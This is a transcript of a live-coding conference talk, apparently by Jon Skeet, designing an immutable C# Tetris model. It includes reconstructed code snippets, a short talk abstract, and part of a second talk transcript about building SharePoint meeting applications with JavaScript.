So a little bit of detail. There's guaranteed to be a memory write barrier at the end of a constructor. By guaranteed, I mean one of the BCL teams blog posts or CLR teams blog posts somewhere details this. The memory model in.NET is not very well documented. There's the ECMO CLI specification which is relatively weak and then there's what we know that Microsoft's actually implemented and which I trust that Mono implements as well. And I know that there's a write barrier at the end of a constructor. So if you share a reference after a constructor has finished, then any thread should see the same data. That is not true with the way I'm writing things now. If you say so. Yeah. At this point, my brain's left the building. Have fun. Right. So the problem with how I'm writing this now is if I've got two threads observing this, it's possible, even though I return after, so I return from pause and then share that reference with another thread, it's possible that even though the new thread gets to see the reference, things haven't quite flushed to main memory or there's some caching involved somewhere and we still see some default state. So to summarize this from my small intellect, you're thinking about threading right out of the box. You're thinking about colliding things, correct? I'm thinking that we generally think that immutable things are thread safe. Yeah? Sorry? No. Immutable things not being thread safe. Tell them more. You're in trouble. No, no, no. I'm going to sit back and think what you take it before we are. So in what way, so firstly there's define what thread safe means, the typical Eric Lippert kind of response. But usually it's okay if you're in Kevlin Henney's talk, it's okay to have shared states as long as no one can modify it because everyone will see the same thing and we can't get into a state where you're trying to modify it at the same time as I'm trying to modify it. So the normal mantra is that immutable objects are thread safe. I'm going to say they're sort of not in a sec, but why are you saying they're not? Whoever it was, I can't actually see. I think he ran out of here. He's gone. Okay. So what I'm going to say here is this is publicly immutable, but you can tell that we're privately mutating this and the one time that you are really allowed to privately mutate is before the constructor has finished and making sure that you don't let the current reference out of the object until later on, until the constructor has finished. You showed me this once. Did I? Yes. Okay. Well, I'm cheating slightly and I've lost any time that it's made up by explaining all of this. Hopefully it was useful. Okay. So let's start. Let's code this one as well. So this is going to start a new game and a board is going to be board.startnew. So I'm deliberately using start as a game thing, whereas create. So a board doesn't inherently know whether it's alive or dead. So start doesn't feel quite right, whereas create new does. On the other hand, in this particular case, I could get away with the constructor. We're going to make this, wow, generate constructor stub. That's more like it. But I'm going to make this internal. So the idea is that I'm going to trust that nothing within model is broken. So I trust myself to call constructors. I'm not going to trust anyone else at the moment. We might decide that for testing purposes, this is a pain. When I want to test board, I'm going to want to be able to construct it and not have to create a game. 
However, I'm going to immediately add in assembly info. Internals visible to tests. In fact, I thought there was a skeet flag that you're going to go, I'm John Skeet. Do not mess with me. Did you guys ever use a skeet flag when you're compiling a code? One important point, so one point of debate. When you write tests, what do you test? Everything. That's good. How? There is this mantra within some of the testing community. The testing community likes to argue, it feels to me, about what you test. Should you ever test this internals visible to? No, you should, but only be poking it through the public API. I'm doing an impression of myself now. I test general to specific if that is answering the question. Where I've got to personally is you need to test at different levels. There will be things that are difficult to test, edge cases that are hard to test by getting there through the public API. I have a method that is called through this long chain of calls, but I really want to test five different situations. I could work out the five different ways of getting there, or I could just give myself access in the tests, make them definitely white box tests and poke it that way. I personally think it's good to have a mixture of those tests. Those white box tests are brittle. That's what people always say, if you change the implementation, you'll need to change your white box tests, even if nothing in the public API is changing. It's like, yeah, I'm okay with that. Maybe at that point you write a black box test as well. I'm assuming you want to make some kind of change. It should be a publicly visible change, and maybe you write a test at that point that fails using black box testing, and then see that changing, see that passing when you've written the change to the internal method. Basically, I'm fine with giving internal access to tests. I try not to promote naturally private methods to become internal, just to have access for tests. Likewise, I don't like things that try to poke at the private methods using reflection, because that really does get brittle for you. I think there's a happy medium to be had. Well, as they say, it's not a problem until it's a problem, so you can fix it if you have to. Right, so we've got state, is gamestate.active. We need to have our board. A board just starts off being empty. So we can make tiles with height. In fact, we don't need these separate properties to be setable, because we can just do length, no. Array.getLength0. So for rectangular arrays in C-Shop, they are, as opposed to jagged arrays like this, so that's just an array of an array. This is a rectangular array, and there are various methods on the array class, which give you the length of each dimension. Now, I'm not entirely sure that I've got this zero and won the right way around, so at this point, I am actually going to write a test. Do you know what, I should add a reference. No, I do this all the time. Darn it. What are you doing? It's a checkbox. I always select it, because I think that's how you used to do it. No, I think in 2010 it changed, but in 2008, you would just select the rows, not bother with checkboxes, hit OK, and it would do the right thing. You notice I'm missing license terms at the top of all of this, and nice dot comments and stuff. I can't be bothered. This is not going to go on to any kind of source control, by the way, partly because I don't want Nintendo to see me. I'm hoping they'd be happy enough to demo some of the internals. 
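Roughly the shape the Board and its first test have at this point — a reconstruction rather than the code on screen, with arbitrary tile names and NUnit assumed for the test project:

    using NUnit.Framework;

    public enum TileState { Empty, Cyan, Yellow, Purple, Green, Red, Blue, Orange }

    public sealed class Board
    {
        private readonly TileState[,] tiles;

        // Internal: only the model assembly (and, via InternalsVisibleTo, the tests) builds boards.
        internal Board(int width, int height)
        {
            tiles = new TileState[width, height];
        }

        // Width and height come straight from the array rather than separate fields.
        public int Width { get { return tiles.GetLength(0); } }
        public int Height { get { return tiles.GetLength(1); } }

        // Read-only indexer; the array does the bounds checking for us.
        public TileState this[int x, int y]
        {
            get { return tiles[x, y]; }
        }
    }

    [TestFixture]
    public class BoardTest
    {
        [Test]
        public void DimensionsAreWidthThenHeight()
        {
            Board board = new Board(50, 20);
            Assert.AreEqual(50, board.Width);
            Assert.AreEqual(20, board.Height);
        }
    }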
I suspect this isn't what the actual code looks like. You could make millions. Skeetris. Skeetris, that's a good name. There are people, Roy Oshrove, if Roy's around, he may be about to hurt me. We need a reference to model up board. I'm going to create one with 50-20. I can do my best to end the impression. Seriously. I would do a Roy impression, but I don't have a guitar on me. There are two things potentially wrong with this test. We have repeated constants. Instead, we should create... Seriously? For a three-line or four-line test, does anyone actually think that this is much better? I'm happy enough repeating the constants. I have been told off in public talks before now for having more than one assertion in a test. I should have a height test and a width test. If I get one of them wrong, I can tell immediately what's wrong without having to actually look at the line number. Looking at the line number apparently takes hours and hours and hours. It's just a horrible, horrible experience. I got it right. As long as we know that it is width and then height, X and then Y will be fine. That's our ski test. There's no red-green refactor. It's just green, green, green, green, green, green, green, green. We did consider doing a version of this where we had a bottle of Scotch or something, and every time I got a build failure, I had to take a drink. I think that might have been more amusing for me than you guys. You would have me giggling insanely by the end of the night. I'm a real lightweight. Take me drinking. I'm really cheap. How many people are going to Twitter that right now? I'm going to come up with a little thing that's a preconditions class. I should really put this somewhere at some point. In fact, no, this can be internal. I like having preconditions. I like throwing exceptions where appropriate. I'm going to put one in to start with T, check not null. T string name, T value, where T is a reference type. Remember that in T-Shop, where T is a class doesn't mean where T is a class. It just means where T is a reference type. It could be an interface. I'm going to do if value is null, throw new argument null exception. I never remember the way around that parameter name and their message. Name, not in quotes. Joe, that's good enough. What message do you need for argument null exception? Possibly it was actually this value. But we know that the value was null. It's the only possible value. But if it's genuinely not null, then I'll return the value. That needs to be static. I'm not going to use that first, but that is my most common use. The other one I'll do is avoid method of check state. A message. I'll do if not condition, throw new variation exception, message. I'm going to use this immediately for pause. Preconditions.checkState. This is state in a general term. We'll have that on board and things, not game state. We happen to also be checking the game state. I should only be able to pause a running game. There is no point in pausing a game that's already finished and there is no point in pausing a game that's already paused. Can only pause an active game. An interesting alternative here would be to give it an expression tree instead. I'll put this in preconditions. I'm not suggesting you should actually do this. It's just an interesting idea. For the human beings out here, what are you doing? The problem is that I've got to write this message and I'm lazy. If I change this condition, I might not change the message. 
Whereas if I have an expression tree, I don't need a message because it's self-documenting code. I'm going to compile the expression tree and if it's wrong, I'll just... That's kind of crazy code, but it's valid. Expression trees. How many of you are familiar with expression trees? Oh, not actually that many. How many of you are familiar with delegates? Good, more. A delegate is something you can run. An expression tree is like a delegate in data form. You can go from this data form to an actual delegate and then execute it. Or you can examine it. It's a tree of things like... You start with a parameter expression and all kinds of things. This is how link works for a linked SQL. It takes this expression tree. You've written where ID equals... Where food.id equals ID and the compiler builds an expression tree. It's got this data representing the behavior you're interested in. It passes that to linked SQL that says, I know I'll turn that into a SQL of where id equals this, that or the other. But you don't have to be using linked SQL or whatever to use expression trees. They're handy just like this. Let's write a test. Let's make it deliberately fail. Game test. We'll see what it looks like. I'll make it not pass to start with. Can pause paused game. Game.startNew. It doesn't matter what the height is. I'm going to pause it twice. This will throw invalid operation exception. I'm hoping it will give me some form that is sufficiently readable that I don't need a different message. The answer is it passed. Do you know why? Because I'm immutable dummy. Game equals game.pause. I laughed because I was stupid here. I've designed this thing. How can I not use it properly? I can't think of a better name than pause here. But something I was talking about in my Notatime session yesterday is the difference when you're writing an immutable API. It should look a bit different. Let me show you some examples. I'm assuming that we don't really care very much how far we get in Tetris. We just want to dig into my brain and see whatever comes out. I've never understood the fascination. Really, I'm not that smart, but people seem to like it. Here we have some perfectly valid useful code because it creates a list of strings and it adds something. Don't use datetime.now. It's horrible. Ignore the fact that Resharp is already complaining at me. That code is bad code. Let's make it even more similar to the list version. What do we get to add? Timespan.fromDays1 These two look the same. This is wrong because the only thing that this can usefully do is see whether today is less than one day from the end of time as far as.NET is concerned, which is the year 9999. If it is, it will throw an exception. That's the only side effect it can have and we're not doing anything with the result. We really want something like datetime tomorrow equals. It's not obvious just from reading the code. If you've written this bad code, you might think it's okay because I call add to add something to a value. In no-time, it would be instant.now equals clock.now because it's testable. You would do now equals now.plus duration.fromMinutes1 or whatever. It's plus instead of add because if I write now.plus, that sounds wrong. It's good if ever when you're writing an API, you can make wrong code sound wrong. You're doing well. Unfortunately, pause is sort of, yeah. I'm not sure what else I would call it. However, let's make this fail and go back to the expression trees. There's no way on earth we're getting a working game. Any teams? 
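A sketch of the Preconditions helper as described, including the expression-tree variant where the condition's own printed form becomes the failure message (my reconstruction):

    using System;
    using System.Linq.Expressions;

    internal static class Preconditions
    {
        // Throw for null, otherwise hand the value straight back so calls can be chained.
        internal static T CheckNotNull<T>(string name, T value) where T : class
        {
            if (value == null)
            {
                throw new ArgumentNullException(name);
            }
            return value;
        }

        // Plain version: the caller supplies the message and has to keep it in sync.
        internal static void CheckState(bool condition, string message)
        {
            if (!condition)
            {
                throw new InvalidOperationException(message);
            }
        }

        // The "interesting idea": take an expression tree, compile and evaluate it,
        // and use the expression itself as the self-documenting failure message.
        internal static void CheckState(Expression<Func<bool>> condition)
        {
            if (!condition.Compile()())
            {
                throw new InvalidOperationException("Precondition failed: " + condition.Body);
            }
        }
    }

    // Usage inside Pause might look like:
    //   Preconditions.CheckState(State == GameState.Active, "Can only pause an active game");
    // or, with the expression-tree overload:
    //   Preconditions.CheckState(() => State == GameState.Active);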
I thought I wasn't passing the message yet. Sorry, I thought I had. Let's have one precondition rather than two. That was when we were actively specifying a message. Now, we get to see our code. Let me blow that up a bit by putting it into code. This is what the message is. It's not ideal, but it's not bad. There are times where you can auto-generate error messages. In this case, it would probably be fairly expensive. While I'm not a massive one for micro-optimization, generating a new expression tree all the time, I don't know how cashable that would be given that we're using immutability. It would have to be a different expression tree every time because it's got to have a reference to the current game so that it can check its state. Let's not go there. Let's have the message. We can immediately write unpause. Let's only be able to unpause. Because we knew it was active before, that's one of the nice things about saying you can't pause a dead game, you know that when you unpause, you've got to be going back to a live game. What else can we do with a game? What other actions are we going to have? End, win, lose. No, no, no. Connery. Connery? What? Right. Should we, sorry? New tile. New tile. I don't think so. Whose job is it to say that a new tile should be falling? Yours. The game. I'm trying to interact with the game and it shouldn't be my responsibility. I shouldn't be able to break it. Me saying win, think about, I want to write something that if this were to report scores somewhere, then a user shouldn't be able to cheat effectively. I'm not particularly talking about worrying about them actually doing this, but a good object model doesn't let you use it the wrong way. And saying I've won now is sort of cheating. Isn't that what you do on Stack Overflow? Speaking of which, I haven't checked it for like half an hour. No, you're not going to. Stay on target. No, we were going to check for it. He does this all the time. You have taken bribes from people. Right, so I think the things that we can do are have a tick. So, time passing. So, I don't know what we call this. I'll just call it tick for the moment to do think of a better name. Fortunately, we don't have any cache invalidation to do in this. Otherwise, we'd have both of the hard problems of computer science. So, someone was saying the only two difficult problems in computer science are cache invalidation and naming. And I think naming hurts all of us every single time. So, when we tick, we've got to have something to do. And currently, our board is always empty and we don't have any pieces. So, I think the first thing to do is address that. So, we don't even know what the game state is going to be. I can do nothing at the moment. No, I can do one thing. If state is paused, so time is still allowed to pass while we're paused. And we can just return. That's fine. Nothing's happened. Okay. And we can also do... That's a design decision. We could make it so that it just kept going. In fact, if we've got some really dumb external clock that's just going to keep giving ticks, maybe we won't say... Yeah. This allows the ticker to be as dumb as possible. Sorry, was that a question? No. Okay, cool. If you want to ask anything, do just shout. Okay? So, we now need the idea of a piece. So, I think we'll have a current piece. And now one annoying thing is I'm going to create a new game each time. Every time I add a bit of state up here, I've got to update all of these state transitions. That's going to get annoying really quickly. 
So, instead, I will do a clone method. I'm not implementing cloneable or anything. And so, this is the only place that I should need to look each time. And it's literally just going to do... state equals this.state, current piece equals this.current piece. Now, the annoying thing is I can no longer... I'm really now way outside the constructor. I can do return... I can do game clone equals clone. And then clone.state equals gamestate.posed.return clone. So, why are you doing the clone again? I kind of lost that. So, we are immutable, right? So, we need to create a new game. Oh, yes. On every time. So, we've already got a bunch of methods which are returning a new game. But if I need to set each field... Effectively, on each state transition, I want to only be able to write code that says, this is how it's different from before. Okay? So, there's an interesting way that we can get around this. So, this will work, but is a little bit ick. I really liked the fact that I could just set things. So, the only way that you can get object initializers to work is if you have a... a new expression. It's kind of annoying, but that's the way it is. What I could do is a little nested class. It's private because only I'm going to look at it. I definitely don't want anything else using this. And then I can write for each property that I have in the main game. I can write a new one here with setters. So, GameBuilder... It doesn't matter that this is public, but... So, this will take a game. And we can keep the clone. So, what I need to do now is have the... I'm stupid. Ignore everything I've just been saying because the sensible thing to do here is to create a constructor within game, which takes another game. What? Is that like inception? No. This is really fine. I'm stupid for not thinking of this before. So, this is the place to clone everything. So, this is the private constructor. So, this is our clone method, but rather than as a method, just as a constructor. And the great thing is I can then do... State... I can do what I'm about to show you. Okay. Right, so I can now do new game this. Except in this... It's getting like JavaScript right here, I just got to say. I mean, it's kind of wacky. In what way? I don't know these things. Well, it's just the concept of what is this and what you're playing with. Oh, no, we're not doing any cover capturing or anything in this case. It's relatively straightforward. If you say so. No, if you think it's not, let's get to the bottom of that. Equals... Oh! Do-do. Okay, we'll come back to that in a minute. But the pause bit, rather than do this game clone stuff, which what idiot thought of that, we'll do return new game this. State equals gamestate.posed. Okay, so now that you can see where I was trying to go, does it make sense? Oh, sure it does. I've just never seen this pattern before. I mean, never seen anything like it. Okay, has anyone else seen this kind of thing? Yeah? Any functional coders who can recommend something better within C-Shop? Okay. Someone up there? Oh, yeah. I could have a default parameter. I can have default parameters, but they won't copy it from... It would be lovely if you could say, if you don't pass any parameters, then pass this. But I've got nothing else... I want to be copying from the current game into a new one, and there's no way I can default to passing this, unfortunately. I think I see what you mean, but it wouldn't work. 
So, I think the suggestion was we could do something like game, and were you thinking of having parameters within the constructor? No? Sorry? The clone method. Oh, I see. Right. Ah, yeah. Okay, that would work. Okay, so we could do... Good one! New board. Yeah, this will work. State... Yeah, new state. No, it's game state. It calls null. And current piece, new piece, which sounds a bit funky, but it's fine. Right. And then current pience. Right, so now we can... Oh, yeah. So, we can't do that for game state, because there has to be some... We have to specify a default parameter. What we could do is a nullable game state. That's okay. And current piece, why doesn't it like that? Thank you. Okay, so it still doesn't like that. We haven't come up with a piece type yet. Fine. So now we can do returning new game at this.board... Sorry, where the board is new board, this.board. State is new state. This.state, game state, no state. And current piece is new piece. This.currentpiece. Okay, and now we can do... Let's call it change state. Or with state. That's nice. So with is quite a good... If you're thinking about methods that mutate stuff, or look like they mutate stuff, but actually return a new one, I like with state, or you're with foo, with bar. So let's get rid of the crazy stuff here. Having one or the other would be fine. Just to say, my previous plan would have been... Would have worked. But we can do with state, or this.stopwithstate, irrelevant which, and then use a named argument of new state, gamestate.posed. That reads pretty good. I like that. It's not bad. And then we can do the same thing. There. Right, so we've got the idea of starting new, and we've come to the idea of we need a current piece, because something's got to happen when we tick. So a piece will have a position, which there may well be an appropriate position struct somewhere. We only need it to be integers. I suspect that most position E kind of structs are double related. And also, I tend to think that most position like structs are going to be either within system.windows.forms or system.presentation, windows.foundation, whatever it is. And we want to be able to do this for the console app. So it should really be completely UI neutral. So we could write a little position struct. I'm just not going to bother, because it's not worth it. And we have 12 minutes. So the other thing that a piece has is an orientation. And let's just hold the horses on that. We might be tempted to write a setter and a getter for the orientation. I don't think it's worth that, because what does the rest of the world want to know about a piece? They want to know. It's tile state. This is slightly irritating. John, why is a piece more mutable? It will be. Yeah, these are private setters. And obviously, I would make everything sealed. So this is definitely going to be... Well, if you're going to have immutable types, you really, really want to seal them. Leaving the whole argument about whether you want to leave everything up to everyone else to decide whether or not they want to extend, or whether you want to lock everything down. You want to lock everything down. But leaving that perfectly valid discussion for another time. If you're going to say this type is immutable, then other people should be able to receive an object that is compatible with that type. So I want to be able to receive a piece and know that it's safe for me to keep a copy of that reference, and it's not going to change. 
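Pulling the copy-constructor-plus-With idea together, the Game transitions at this point look something like the following sketch; Board and Piece are stubs here, and the precondition helper is a trimmed copy of the one sketched above, just so the snippet stands alone:

    using System;

    public sealed class Board { }
    public sealed class Piece { }
    public enum GameState { Active, Paused, Dead }

    internal static class Preconditions
    {
        internal static void CheckState(bool condition, string message)
        {
            if (!condition) { throw new InvalidOperationException(message); }
        }
    }

    public sealed class Game
    {
        public Board Board { get; private set; }
        public GameState State { get; private set; }
        public Piece CurrentPiece { get; private set; }

        // The copy constructor plays the role of Clone: the one place that has to
        // be updated when new state is added.
        private Game(Game other)
        {
            Board = other.Board;
            State = other.State;
            CurrentPiece = other.CurrentPiece;
        }

        // Every transition only says how the result differs from the current game.
        private Game With(Board newBoard = null, GameState? newState = null, Piece newPiece = null)
        {
            Game clone = new Game(this);
            clone.Board = newBoard ?? Board;
            clone.State = newState ?? State;
            clone.CurrentPiece = newPiece ?? CurrentPiece;
            return clone;
        }

        public Game Pause()
        {
            Preconditions.CheckState(State == GameState.Active, "Can only pause an active game");
            return With(newState: GameState.Paused);
        }

        public Game Unpause()
        {
            Preconditions.CheckState(State == GameState.Paused, "Can only unpause a paused game");
            return With(newState: GameState.Active);
        }
    }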
Not just it's not going to change in ways that I care about, because I only know about piece, but I really don't want to have any other changes of some subtype, even if I don't care about it. I may be passing this to someone else who says, oh, well, if it's this kind of piece, I will note something. And then they've got an old copy of my now mutated piece. It just goes horribly wrong. Immutability should be absolute. An object is either immutable or it's not. So system.object is not immutable because it doesn't stop me from writing immutable subtypes. So I'm going to call tile state. I'm going to hate this. So we want something. This tile state concept is a useful one. It represents the type of a tile. I've got it. OK, let's revisit a decision. We said before, wow, you should have picked me up. Why didn't you pick me up? I was trying. You were just on a roll. We said before that a space on the board is either one of this some kind of tile type, which we're giving colors, but we don't need to, or it's empty. That's the perfect place to use an nullable type. So all we need to do is change our board. So it doesn't have. You're excited about this. I am. It's good. So unfortunately, the default value for a nullable value type is still the it doesn't have a value. So now I'm fine other than the fact that this is named incorrectly. So it's a tile type rather than a piece type, but a piece is formed of tiles all of the same type. Make sense? So in our game, no, in our piece, it's entirely reasonable to have something like this. And okay, so it's going to have a type and I think having said I don't want positions, I really do want a position. So this is unfortunately going to clash with other things. I've had various internal types and they should all be public to be honest. Right. So having said I'm not going to do anonymous, I would just do automatically implemented properties. I kind of refuse to do it for structs. I really, really, really want the fields of a structure be read only. If we ever felt we wanted to use a board that is too long for int or maybe has fractional positions, we could make position generic. I'm really, really stressing that we don't go there. So okay, we now have a position. And I don't think pieces need to know the orientation or other a piece needs to know its own orientation, but no one else does. All we need to do is be able to guess at the positions. What is resharper complaining about there? It must be more. Oh yeah, because these should be public. So it's saying you can't. It was already private and you can't specify you've got a private setter on an already private property. Nor can you do make this internal and then give a more public part that will die in the same way. Right. So we don't even need, wow, there's so much that we don't need. So the piece needs to know some anchor position and we need to be able to know the type because ultimately we're going to want to draw this. Okay. What do you need to know to draw a tile? You need to know the type, so the color that you're going to draw and the positions to draw. That's all you need to know. So that's all I'm going to tell you. Okay. And I'm going to implement that another time. But the operations on this. If anyone can think of a better name again than rotate, so rotate sounds like we're mutating it. It's almost after clockwise rotation. Mutation rotation. Yeah. With rotation. So with a new bit of state, a new property makes sense, but with an action doesn't quite work for me. As clockwise. No, I don't. 
Rotate it. Sorry, did you say rotated? Yes, that's exactly right. Yes. Good man. Yeah. So look at how this is going to read elsewhere. So we're going to write. What can I just jump in? Yeah. You have five minutes left and I was thinking that people might want to ask questions. Yeah. If you don't want to ask questions and you want to keep watching them code, that's fine. But I was thinking that there might be some questions unless. So it's dead as mine. Let's just write this one thing, rotate piece right. And okay, we'll probably want to change the name of this afterwards as well. So when the user tries to rotate a piece right, it doesn't try to. It doesn't try to get at the piece and rotate that it says to the game, you know, the next thing I want you to do is rotate right and we'll say, um, bar rotated equals current piece.Rotated right. Rotated clockwise. Oh, I like it. And then we'll see, um, you know, if, uh, board dot, um, uh, collides, collides with the game, rotate it, return this. Okay. Obviously we would, you know, write the methods and stuff. Otherwise, uh, we'll, um, return, um, new, uh, no, we'll return our with state. Um, new piece is rotated. I think there might be something in this functional lock. It's, it's quite, quite sweet. So all that changes when we rotate a piece clockwise is we've got a new board with exactly the same state except the rotated piece clockwise after we've tried to rotate it. And if rotating it doesn't do anything, then we just return the same reference because no state has changed. We might also want, and this is where I don't know how the functional stuff hangs together. We might also want an event of you failed to do something so that we can go at the user if they try to rotate it and it would collide. Um, I'm not sure. Um, okay. Uh, you were asking for questions. Any questions we have three and a half minutes? Yeah. Yeah. So you're, uh, you're doing all the state stuff. What will happen, how will you implement the case where the user tries to rotate the piece? That's exactly the same input that it takes. Right. That's a great question. The question was how will we cope with a user tries to rotate at exactly the same time as it ticks? And this is something that, frankly, I'm disappointed Rob didn't bring up. Um, of how we should be. Um, your code is bad and you should feel that. Um, that's every answer you ever gave me on Stack Overflow. Um, so how we manage the ticking, uh, should determine this. So, um, there are different possibilities for this. Uh, one is that we put all the ticking on the UI thread. So we just put a dispatcher timer in the WPF version and we say, you know, either it ticks or we get a button pressed, but only one of those is going to happen at the same time. Um, or we have some sort of shaperoning thing. So, so we make sure that actually we don't call, it's safe to call both actions on the same board, but only one of them is going to get through to the UI. Um, because the board doesn't have any idea of current. Every board is current for its own, in its own happy little world. Um, it is current and all it can say is, well, if this happened, this is what the world would look like afterwards. So you do need to make sure that those happen in some kind of order. Um, so you could have a queue of how things are happening, but you want to make sure that no two actions happen to the same board. Um, or other, well, in fact, we will have things happening to the same board. 
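Before the discussion moves on to the threading question, here is roughly how the rotate-right handler sketched above might look as a method on the Game type, assuming a Board.Collides check and a Piece.RotatedClockwise method exist elsewhere.

```csharp
public sealed class Game
{
    // ... board, currentPiece fields and WithState as in the earlier sketch ...

    public Game RotatePieceClockwise()
    {
        var rotated = currentPiece.RotatedClockwise();

        // If the rotated piece would collide, nothing changes, so the same
        // immutable instance can be handed straight back to the caller.
        if (board.Collides(rotated))
        {
            return this;
        }

        return WithState(newPiece: rotated);
    }
}
```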
So if the user tries to rotate right and then it ticks, um, then we'll have returned this. So it's not like we want to put something on saying, oh, I remember that something's happened to me, therefore nothing else should happen to me. Because one of the nice things about immutability is if you don't need to change state, you can just reshare the same reference. Um, so there are, there are interesting ways of doing that. Basically, it would require locking of some description or some kind of synchronization, some coordination to make sure that things don't happen actually at the same time. Um, or some protection that said, well, I will detect if things have happened at the same time and throw away one of those results and it sort of doesn't matter. But I then need to reapply the action on top of the later one. So, um, imagine that you had transactions in a database so long as you can notice if they collide, it's okay. And in fact, imagine that you had, uh, rotate right that doesn't work and a, and a something else that doesn't work. Um, it's, it doesn't matter, something else that doesn't change the state. It doesn't matter if those both happen at the same time because the result is still going to be exactly the same afterwards. Um, I would say the same is true for tick, but it may be valid after the tick, but not before or vice versa. So the ordering definitely matters and, um, I'm not trying to make game itself understand threads. Okay. One thing I would say is even with immutability makes life so much easier in terms of threading, but you really want to limit how many classes in your system have any concept of threads. Um, so don't try to, I used to do this. Um, when I, back when I was, if we lad writing Java code, um, sort of in, in my early twenties, I had learned that if I didn't do any synchronization, things would fail. Okay. So I think there are like four or five stages of awareness of threading. There's, I do nothing. I just merrily go and everyone can mutate everything. I'll start new threads. Everything can modify everything. Fail. You then say, I know how to deal with this. It's the synchronized keyword. I will sneeze the synchronized keyword all over my code base. Every method will be synchronized. What could possibly go wrong? Everything could possibly go wrong. So instead of having it go, ah, I'm, I'm all a mess now. I've got race conditions all over the place. I've got inconsistent things. Instead, your app goes, because you get deadlocks because you haven't thought about it. You then get to my current state, which is, do you know what? This threading stuff's hard. We need to think about it and limit, the more places I have to think about threading, the worse life is going to be. So what I want to do is have a tightly controlled set of bits that need to care, and the rest of the world should just assume that it's being used sensibly by a single thread. So that's why StringBuilder in Java 6 or whenever it was introduced made sense. Previously, StringBuffer was this, I know I shall have StringBuffer that is thread safe, because people are always appending to StringBuffers in multiple threads. That happens all the time, right? Almost never. You don't need to use this sort of thing. So very few classes need to be thread aware, and if you rigidly control it, then it's much easier to reason about things. Yeah. We have to go. We have to go. Okay. Rob needs to buy me drinks. So, well, we haven't even got an application to run, let alone one that builds, let alone anything. 
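One concrete way to follow the advice above, keeping the game itself unaware of threads, is to funnel every tick and every user action through a single owner of the current game. This is an assumed design for illustration, not code from the session.

```csharp
using System;

// Owns the "current" game and serialises all actions onto it, so Game, Board
// and Piece never need to know that threads exist.
public sealed class GameCoordinator
{
    private readonly object gate = new object();
    private Game current;

    public GameCoordinator(Game initial)
    {
        current = initial;
    }

    public Game Current
    {
        get { lock (gate) { return current; } }
    }

    // Both the timer tick and user input go through here, e.g.
    //   coordinator.Apply(g => g.Tick());                  // assuming a Tick method exists
    //   coordinator.Apply(g => g.RotatePieceClockwise());
    public Game Apply(Func<Game, Game> action)
    {
        lock (gate)
        {
            current = action(current);
            return current;
        }
    }
}
```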
Success. Yeah. Ship it. I should say, the code that I wrote when I did this previously, at the end of an hour, I had a console app that did actually work, and during that time, I was consulted about a different bug in an important system. So it can be done, but usually not while discussing design decisions at the same time. I hope you found that useful. I have no idea. But come and ask me any questions later on. Feel free. I'm not going to go any further with this, probably. But it's kind of an interesting kata or exercise. A kata is normally a bit smaller, but it's an interesting exercise. So go have fun. Do it. And I think if you can write a model that you can then put a console view and a WPF view on, then probably you can also put a Windows Store app view and maybe a mobile view and stuff. So, yeah, hope you enjoyed it. Thanks very much. Thank you. Nicely done. That was good. No, we had nothing.
|
Tekpub has a video production series called "Full Throttle!" where experienced developers are put to the test and recorded. The interactions are not scripted, and everything is recorded as it happens. In this talk, Rob Conery (from Tekpub) will put Jon Skeet in the hot seat and make him solve an interesting problem (which he, and you, will only find out at the time). Along the way Rob will toss in a few "curve balls" (last minute changes in requirements) to see how well Skeet can adapt...
|
10.5446/51454 (DOI)
|
What do you think? What do you think? I'm sure. Okay, so, to start. I'm from Computas. My name is Jørna Hatelig. And my computer has just crashed. Or something. So, I'm from Computas, my name is Jørna Hatelig, and my computer has just crashed. Or something. That's not cool. So, yes, that's me. I think I've got the slides up on this side now, so I can see where I am. My name is Jørna Hatelig, I work at Computas, and I'm a senior knowledge engineer. I'm also the leader of our web applications professional network, which means I'm very interested in JavaScript, HTML, CSS3 and so on. That's really cool. My background is on this slide; those are the companies I have worked for. Before I started at Computas I worked with web, mobile web and converting websites to mobile websites. I have also worked with algorithms, databases and web optimization, but mostly on the Linux side: MySQL, PHP and the LAMP stack. So when I started at Computas I had to find something that was me, something that wasn't already taken, and that ended up being HTML, the web and JavaScript, which I have been doing for a long time. I feel that even though I have 20 years of experience with the web, I made my first website about 20 years ago, and I get more experienced every day, for every experience point I also get, again, 20 noob points, because every time I come back to the web there are so many new frameworks and things. What I'm going to talk to you about today is enterprise hipster applications, with SharePoint and JavaScript. Bjørn Einar touched on this a bit in the lightning talks. He is the clown, and we do hipster stuff, but of course we are not hipsters. And the enterprise part is not what we usually think of. That's the USS Enterprise from Star Trek, but our enterprise is more like this. We work for enterprises, and we do collaboration. And when it comes to collaboration, in all industries, a lot of it is about security, and the people out there just want documentation. That's considered a good thing. We have to document what everyone has done and what has been said, who made which decisions and who was not there, and we have to record results or failures and see what we can do better. Microsoft has a kind of solution for this, and that is of course SharePoint. When I started at Computas, SharePoint 2010 was what we were on. It works out of the box, and everyone is very happy about it. Then they start to find out that they need something more, and someone has to do customizations. In our case it is meetings. We talk about meetings: what happens in a meeting, what has been said, and how we can use that afterwards. There are tasks, decisions, documents and everything. SharePoint has this out of the box, and that's fantastic. We have this meeting workspace, and this is what it looks like. When you start to use it, since it has all the things you need, you have decisions and documents, you have an agenda and you have tasks, they can be followed up and you can run workflows on them, and everything is fine, but it is a sort of a mess. And creating tasks in SharePoint is like this. Imagine that you are sitting in a meeting and you want to get something done. Someone decides that a task should be assigned to someone. You have all this data, and you have this big form with lots of buttons, and between every button you click there is a new page, a reload, and it takes a lot of time. And by the time you have managed to enter the task, you notice that the agenda item is already over.
I was new to SharePoint, I didn't know all of it, and there were so many buttons. I didn't know what to do, and I figured I had to combine it with something of my own, because if you are faced with a big task form and have no idea where to start, it is a bit scary, you are in a kind of scary place, and you hope to get some reaction out of it. You want something better, and out-of-the-box SharePoint just doesn't give you that. So that is how it started: around the time I joined, I was introduced to the Arctic SharePoint Challenge. It is like a hackathon on SharePoint. That sounds like a contradiction, but it is really nice. It is three days, you go away so nobody can see you, and the deal is that you earn badges and you earn respect for what you build. The respect is not only for having built something great; there are badges for the best solutions, but there are also badges for the ugliest hacks, and that is the most fun part, right? So for one of the solutions we hacked up there, I figured, okay, bring in jQuery and all the JavaScript we could, and we started building something. So when you want to add something to a meeting, you use drag and drop, and it is automatically stored in the content database in SharePoint. And... my video is not playing. Or is it? No. Let's skip a bit. So we want the sortable tools we are used to from jQuery. And yes, hey, drag and drop. Now the person who is attending the meeting has been assigned a task, right? Because that is one of the important things about a meeting: we know who is in the meeting, so we know you cannot assign things to someone who is not there. And... we fast-forward a bit here. We can also see this very visible handling of tasks here, things move around when they have been assigned on the other side. That is fantastic, isn't it? And so enterprise. So... now we have this meeting application, and we wanted to make it a bit more... usable. So we have a little bit of JavaScript here. 